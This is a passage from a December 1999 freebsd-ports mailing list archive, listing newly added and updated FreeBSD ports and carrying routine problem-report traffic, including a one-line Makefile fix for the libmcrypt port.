listed here contains any patches necessary to make the original application source code compile and run on FreeBSD. Installing an application is as simple as downloading the port, unpacking it and typing make in the port directory. The Makefile automatically fetches the application source code, either from a local disk or via ftp, unpacks it on your system, applies the patches, and compiles. If all goes well, simply type make install to install the application. For more information about using ports, see the ports collection http://www.freebsd.org/handbook/ports.html and http://www.freebsd.org/ports/ There are currently 2847 ports in the FreeBSD Ports Collection. New ports added last two weeks - ------------------------------ Category archivers (http://www.freebsd.org/ports/archivers.html) ================================================================== makeself-1.4 A neat script to make self-extracting archives Maintained by: andrews@technologist.com Category audio (http://www.freebsd.org/ports/audio.html) ================================================================== wmmp3-0.11 A front-end for mpg123 in a Window Maker dockapp Maintained by: jim@FreeBSD.org Also listed in: windowmaker Requires: XFree86-3.3.5, mpg123-0.59r, xpm-3.4k Category devel (http://www.freebsd.org/ports/devel.html) ================================================================== kdbg-i18n-1.0.1 A graphical user interface around gdb using KDE Maintained by: imura@FreeBSD.org Also listed in: kde Requires: Mesa-3.0, XFree86-3.3.5, gcc-2.95.2, giflib-4.1.0, jpeg-6b, kdebase-i18n-1.1.2, kdelibs-i18n-1.1.2, kdesupport-i18n-1.1.2, png-1.0.5, qt-i18n-1.44a, tiff-3.5.3, xpm-3.4k kdevelop-i18n-1.0 A GUI developers' kit for the KDE integrated X11 desktop Maintained by: imura@FreeBSD.org Also listed in: kde Requires: Mesa-3.0, XFree86-3.3.5, gcc-2.95.2, giflib-4.1.0, gmake-3.78.1, jpeg-6b, kdebase-i18n-1.1.2, kdelibs-i18n-1.1.2, kdesupport-i18n-1.1.2, libtool-1.3.3, png-1.0.5, qt-i18n-1.44a, tiff-3.5.3, xpm-3.4k Category editors (http://www.freebsd.org/ports/editors.html) ================================================================== staroffice-5.1a Integrated wordprocessor/dbase/spreadheet/drawing/chart/browser Maintained by: dkiwebe@hagenhomes.com Requires: linux_base-5.2, rpm-2.5.6, unzip-5.40 Category games (http://www.freebsd.org/ports/games.html) ================================================================== rollemup-1.0 Multi Ball, Player, Platform, Media, Cool Pinball game Maintained by: sanpei@jp.FreeBSD.org Requires: linux_base-5.2, rpm-2.5.6 sxsame-3.02 A tile-removing puzzle game for the X Window system Maintained by: aconitum@po.teleway.ne.jp Requires: XFree86-3.3.5, xpm-3.4k Category net (http://www.freebsd.org/ports/net.html) ================================================================== mpd-3.0b1 Multi-link PPP daemon based on netgraph(4) Maintained by: archie@freebsd.org ncplib-1.3.4 NetWare client for FreeBSD. Maintained by: bp@butya.kz rboot-3.0.1 A remote-boot solution for M$ operating systems Maintained by: m.butkus@tu-bs.de Category security (http://www.freebsd.org/ports/security.html) ================================================================== chrootuid-1.2 A simple wrapper that combines chroot(8) and su(1) into one program Maintained by: truckman@FreeBSD.org Requires: sharutils-4.2 Category textproc (http://www.freebsd.org/ports/textproc.html) ================================================================== tkdiff-3.04 A Tk frontend for diff(1) Maintained by: kevlo@FreeBSD.org Also listed in: tk82 Requires: XFree86-3.3.5, tcl-8.2.2, tk-8.2.2 Updated ports last two weeks - ----------------------------------- Category audio (http://www.freebsd.org/ports/audio.html) ================================================================== bladeenc-0.90 MP3 encoder Maintained by: dirk@FreeBSD.org Category comms (http://www.freebsd.org/ports/comms.html) ================================================================== kermit-7.0.196-beta File transfer and terminal emulation utility for serial lines and sockets Maintained by: joerg@FreeBSD.org Category devel (http://www.freebsd.org/ports/devel.html) ================================================================== code_crusader-2.1.4 Code Crusader is a complete code development environment (IDE) for X Maintained by: davec@unforgettable.com Requires: XFree86-3.3.5, gmake-3.78.1, xpm-3.4k ftnchek-2.11.2 Fortran 77 semantic checking utility Maintained by: kargl@apl.washington.edu Category editors (http://www.freebsd.org/ports/editors.html) ================================================================== vim-5.5.67 A vi "workalike", with many additional features. Maintained by: obrien@FreeBSD.org Requires: Motif-2.1.10, XFree86-3.3.5, tcl-8.0.5, xpm-3.4k Category games (http://www.freebsd.org/ports/games.html) ================================================================== xemeraldia-0.31 A game of breaking blocks Maintained by: ports@FreeBSD.org Requires: XFree86-3.3.5 Category japanese (http://www.freebsd.org/ports/japanese.html) ================================================================== ja-dvi2dvi-1.1 A DVI to DVI transformer Maintained by: watanabe@zlab.phys.nagoya-u.ac.jp Also listed in: print Requires: gmake-3.78.1, ja-vftool-1.2 ja-lynx-2.8.3dev.16 A terminal-based World-Wide Web Client with multi-byte modification Maintained by: shige@FreeBSD.org Also listed in: www Requires: bzip2-0.9.5d ja-man-doc-3.4 Japanese online manual pages corresponding to /usr/share/man/man* Maintained by: horikawa@jp.FreeBSD.org ja-slrn-0.9.5.7.1 A newsreader based by S-Lang Maintained by: mega@minz.org Also listed in: news Requires: ja-libslang-1.3.8.j067 ja-texinfo-4.0 Typeset Texinfo files for printing. Uses TeX Maintained by: mitsuru@riken.go.jp Also listed in: print Requires: ja-ptex-common-2.1.8, ja-ptex-euc-2.1.8 ja-tkdesk-1.1p58 A graphical, highly configurable and powerful file manager Maintained by: yatt@msc.biglobe.ne.jp Also listed in: x11-fm tk42 Requires: XFree86-3.3.5, gmake-3.78.1, im-130, ja-e2ps-4.0, ja-easypr-0.25, ja-tcl-7.6, ja-tk-4.2, jpeg-6b, netpbm-8.0, psutils-a4-1.17, tiff-3.5.3 Category mail (http://www.freebsd.org/ports/mail.html) ================================================================== exim-3.12 High performance MTA for Unix systems on the Internet Maintained by: sheldonh@FreeBSD.org Requires: XFree86-3.3.5 Category math (http://www.freebsd.org/ports/math.html) ================================================================== gnuplot371+-1.1.9 A command-driven interactive function plotting program Maintained by: nakaji@tutrp.tut.ac.jp Also listed in: japanese graphics Requires: XFree86-3.3.5, autoconf-2.13, freetype-1.3, gd-1.7.3, gmake-3.78.1, ja-vflib-2.24.1, m4-1.4, png-1.0.5 Category net (http://www.freebsd.org/ports/net.html) ================================================================== arla-0.28 A free AFS client implementation Maintained by: thepish@freebsd.org cvsup-bin-16.1 A general network file distribution system optimized for CVS repositories Maintained by: jdp@freebsd.org Also listed in: devel cvsup-16.1 A general network file distribution system optimized for CVS repositories Maintained by: jdp@FreeBSD.org Also listed in: devel Requires: XFree86-3.3.5, modula-3-3.6, modula-3-lib-3.6 cvsupd-bin-16.1 A general network file distribution system optimized for CVS repositories Maintained by: jdp@freebsd.org Also listed in: devel xwhois-0.4.0 A GTK-based frontend to the whois service (RFC954) Maintained by: billf@FreeBSD.org Requires: XFree86-3.3.5, gettext-0.10.35, glib-1.2.6, gtk-1.2.6 Category russian (http://www.freebsd.org/ports/russian.html) ================================================================== ru-wmcyrx-2.1 The cyrillic keyboard layout manager for Window Maker Maintained by: ozz@FreeBSD.org.ru Also listed in: windowmaker Requires: XFree86-3.3.5, xpm-3.4k Category security (http://www.freebsd.org/ports/security.html) ================================================================== sudo-1.6 Allow others to run commands as root Maintained by: mharo@FreeBSD.org Category sysutils (http://www.freebsd.org/ports/sysutils.html) ================================================================== ipsc-0.4.0 An IP Subnet Calculator Maintained by: jeremy@external.org Also listed in: gnome x11 Requires: prips-0.9.2 prips-0.9.2 Prints IP subnet ranges by list or CIDR Maintained by: jeremy@external.org wmbattery-1.11 WindowMaker dockapp that displays info about your battery Maintained by: andrews@technologist.com Also listed in: windowmaker Requires: XFree86-3.3.5, gmake-3.78.1, xpm-3.4k Category www (http://www.freebsd.org/ports/www.html) ================================================================== analog-4.0 An extremely fast program for analysing WWW logfiles Maintained by: ache@freebsd.org thttpd-2.07 Tiny/turbo/throttling HTTP server Maintained by: anders@fix.no Category x11-servers (http://www.freebsd.org/ports/x11-servers.html) ================================================================== xtt-3DLabs-1.3.0 A X True Type Server for SVGA Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-8514-1.3.0 A X True Type Server for 8514 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-AGX-1.3.0 A X True Type Server for AGX Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-I128-1.3.0 A X True Type Server for I128 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-Mach32-1.3.0 A X True Type Server for Mach32 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-Mach64-1.3.0 A X True Type Server for Mach64 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-Mach8-1.3.0 A X True Type Server for Mach8 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-Mono-1.3.0 A X True Type Server for Mono Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-P9000-1.3.0 A X True Type Server for P9000 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-S3-1.3.0 A X True Type Server for S3 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-S3V-1.3.0 A X True Type Server for S3V Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-SVGA-1.3.0 A X True Type Server for SVGA Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-VGA16-1.3.0 A X True Type Server for VGA16 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-W32-1.3.0 A X True Type Server for W32 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-common-1.3.0 Common files for X True Type Servers Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2 xtt-xfs-1.3.0 A X True Type Font Server Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98EGC-1.3.0 A X True Type Server for X98 EGC Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98GA968-1.3.0 A X True Type Server for X98 GA968 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98GANBWAP-1.3.0 A X True Type Server for X98 GANBWAP Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98MGA-1.3.0 A X True Type Server for X98 MGA Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98NEC480-1.3.0 A X True Type Server for X98 NEC480 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98NECS3-1.3.0 A X True Type Server for X98 NECS3 Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98NKVNEC-1.3.0 A X True Type Server for X98 NKVNEC Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98PWLB-1.3.0 A X True Type Server for X98 PWLB Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98PWSKB-1.3.0 A X True Type Server for X98 PWSKB Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98SVGA-1.3.0 A X True Type Server for X98 SVGA Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98TGUI-1.3.0 A X True Type Server for X98 TGUI Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98WABEP-1.3.0 A X True Type Server for X98 WABEP Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98WABS-1.3.0 A X True Type Server for X98 WABS Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 xtt-98WSNA-1.3.0 A X True Type Server for X98 WSNA Graphics Cards Maintained by: taguchi@tohoku.iij.ad.jp Requires: XFree86-3.3.5, freetype-1.3, ja-p5-jcode.pl-2.10, perlftlib-1.2, xtt-common-1.3.0 Category x11-wm (http://www.freebsd.org/ports/x11-wm.html) ================================================================== piewm-1.02 A tvtwm with pie (circular) menus Maintained by: ports@FreeBSD.org Requires: XFree86-3.3.5, xpm-3.4k _________________________________________________________________ © 1996-1999 by Wolfram Schneider. All rights reserved. Please direct questions about this service to www@FreeBSD.org General questions about FreeBSD ports should be sent to ports@FreeBSD.org Last database update: 1999-12-11 22:56:16 UTC; based on revision 1.251 _________________________________________________________________ This information was produced by http://www.freebsd.org/cgi/ports.cgi -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBOGTy5DmN/mkrcYGtAQGCtwP+I5LeGkRUYX+RRmWfDxSvi1r+vR7Conum iBIUJEExPpBB7HqIg8ePSdN2UkOaHtTJHH4gzUUA4zGRQRYEab5KAQiLXIQ10EZj 7ipX3WJscCV2Z5aBUEaYHikUpQdHQee9KY9vGztVh4bTVWYeekMyng9zFsFfNTTc kcoYiEsbeWQ= =hx8P -----END PGP SIGNATURE----- -- Wolfram Schneider http://wolfram.schneider.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 9:37: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD30014CE4; Sat, 25 Dec 1999 09:37:02 -0800 (PST) (envelope-from sada@FreeBSD.org) Received: (from sada@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA17990; Sat, 25 Dec 1999 09:37:02 -0800 (PST) (envelope-from sada@FreeBSD.org) Date: Sat, 25 Dec 1999 09:37:02 -0800 (PST) From: Message-Id: <199912251737.JAA17990@freefall.freebsd.org> To: sada@FreeBSD.org, freebsd-ports@FreeBSD.org, hosokawa@FreeBSD.org Subject: Re: ports/13633: Better location for samba's private directory Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Better location for samba's private directory Responsible-Changed-From-To: freebsd-ports->hosokawa Responsible-Changed-By: sada Responsible-Changed-When: Sat Dec 25 09:35:37 PST 1999 Responsible-Changed-Why: Over to the maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 9:55:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AF4814D88; Sat, 25 Dec 1999 09:55:17 -0800 (PST) (envelope-from sada@FreeBSD.org) Received: (from sada@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA19105; Sat, 25 Dec 1999 09:55:17 -0800 (PST) (envelope-from sada@FreeBSD.org) Date: Sat, 25 Dec 1999 09:55:17 -0800 (PST) From: Message-Id: <199912251755.JAA19105@freefall.freebsd.org> To: sada@FreeBSD.org, freebsd-ports@FreeBSD.org, torstenb@FreeBSD.org Subject: Re: ports/14986: possible bug in ssh1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: possible bug in ssh1 Responsible-Changed-From-To: freebsd-ports->torstenb Responsible-Changed-By: sada Responsible-Changed-When: Sat Dec 25 09:54:40 PST 1999 Responsible-Changed-Why: Over to maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 9:59:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F9E314D46; Sat, 25 Dec 1999 09:59:13 -0800 (PST) (envelope-from sada@FreeBSD.org) Received: (from sada@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA19426; Sat, 25 Dec 1999 09:59:13 -0800 (PST) (envelope-from sada@FreeBSD.org) Date: Sat, 25 Dec 1999 09:59:13 -0800 (PST) From: Message-Id: <199912251759.JAA19426@freefall.freebsd.org> To: sada@FreeBSD.org, freebsd-ports@FreeBSD.org, asami@FreeBSD.org Subject: Re: ports/15021: some port installs fail for non-root users Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: some port installs fail for non-root users Responsible-Changed-From-To: freebsd-ports->asami Responsible-Changed-By: sada Responsible-Changed-When: Sat Dec 25 09:58:37 PST 1999 Responsible-Changed-Why: Over to PW. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:40:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A69A9151DE for ; Sat, 25 Dec 1999 10:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA21564; Sat, 25 Dec 1999 10:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mach.greycat.com (mach.greycat.com [207.173.133.5]) by hub.freebsd.org (Postfix) with ESMTP id EAA6314F30 for ; Sat, 25 Dec 1999 10:35:13 -0800 (PST) (envelope-from root@mach.greycat.com) Received: (from root@localhost) by mach.greycat.com (8.9.3/8.9.3) id KAA78896; Sat, 25 Dec 1999 10:35:37 -0800 (PST) (envelope-from root) Message-Id: <199912251835.KAA78896@mach.greycat.com> Date: Sat, 25 Dec 1999 10:35:37 -0800 (PST) From: dann@greycat.com Reply-To: dann@greycat.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15687: security/libmcrypt syntax error in Makefile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15687 >Category: ports >Synopsis: Syntax error in Makefile: MASTER_SITES needs "\" at end of line >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 10:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dann Lunsford >Release: FreeBSD 3.4-STABLE i386 >Organization: You're kidding, right? >Environment: FreeBSD mach.greycat.com 3.4-STABLE FreeBSD 3.4-STABLE #0: Sun Dec 19 12:19:55 PST 1999 root@mach.greycat.com:/usr/src/sys/compile/SATELLITE i386 >Description: The Makefile for ports/security/libmcrypt has a typo that causes syntax error: The MASTER_SITES line needs a "\" to continue. >How-To-Repeat: make (anything) in ports/security/libmcrypt >Fix: --- Makefile.orig Sat Dec 25 10:14:24 1999 +++ Makefile Sat Dec 25 10:15:30 1999 @@ -8,7 +8,7 @@ DISTNAME= libmcrypt-2.2 CATEGORIES= security -MASTER_SITES= ftp://argeas.cs-net.gr/pub/unix/mcrypt/ +MASTER_SITES= ftp://argeas.cs-net.gr/pub/unix/mcrypt/ \ ftp://ftp.internat.freebsd.org/pub/FreeBSD/distfiles/ MAINTAINER= nsayer@freebsd.org >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:47: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CFDAB152C4; Sat, 25 Dec 1999 10:46:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA21877; Sat, 25 Dec 1999 10:46:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:46:53 -0800 (PST) From: Message-Id: <199912251846.KAA21877@freefall.freebsd.org> To: dann@greycat.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15687: Syntax error in Makefile: MASTER_SITES needs "\" at end of line Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Syntax error in Makefile: MASTER_SITES needs "\" at end of line State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:45:51 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:47:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E9A6C14E1B; Sat, 25 Dec 1999 10:47:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA21954; Sat, 25 Dec 1999 10:47:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:47:45 -0800 (PST) From: Message-Id: <199912251847.KAA21954@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, tg@FreeBSD.org Subject: Re: ports/15685: Update /etc/shells after installed pdksh Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update /etc/shells after installed pdksh Responsible-Changed-From-To: freebsd-ports->tg Responsible-Changed-By: steve Responsible-Changed-When: Sat Dec 25 10:47:31 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:49:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A242A1525A; Sat, 25 Dec 1999 10:49:47 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA22231; Sat, 25 Dec 1999 10:49:47 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:49:47 -0800 (PST) From: Message-Id: <199912251849.KAA22231@freefall.freebsd.org> To: nosuzuki@e-mail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15683: update PPxP port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update PPxP port State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:48:38 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:52:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 21925152C7; Sat, 25 Dec 1999 10:52:49 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA22718; Sat, 25 Dec 1999 10:52:49 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:52:49 -0800 (PST) From: Message-Id: <199912251852.KAA22718@freefall.freebsd.org> To: okazaki@be.to, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15682: [update] japanese/groff to 0.99.1.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [update] japanese/groff to 0.99.1.1 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:50:31 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:54:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DD0B71525B; Sat, 25 Dec 1999 10:54:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA22943; Sat, 25 Dec 1999 10:54:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:54:00 -0800 (PST) From: Message-Id: <199912251854.KAA22943@freefall.freebsd.org> To: rover@lglobus.ru, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15679: port update: games/adom to version 0.99.g15 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: port update: games/adom to version 0.99.g15 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:53:24 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:55: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B5B11525D; Sat, 25 Dec 1999 10:55:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA23157; Sat, 25 Dec 1999 10:55:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:55:05 -0800 (PST) From: Message-Id: <199912251855.KAA23157@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15677: unable to fetch vscan port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: unable to fetch vscan port State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Sat Dec 25 10:54:46 PST 1999 State-Changed-Why: New MASTER_SITE added. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 10:56:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9D012150D1; Sat, 25 Dec 1999 10:56:13 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA23326; Sat, 25 Dec 1999 10:56:13 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Sat, 25 Dec 1999 10:56:13 -0800 (PST) From: Message-Id: <199912251856.KAA23326@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15675: problems fetching fd port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 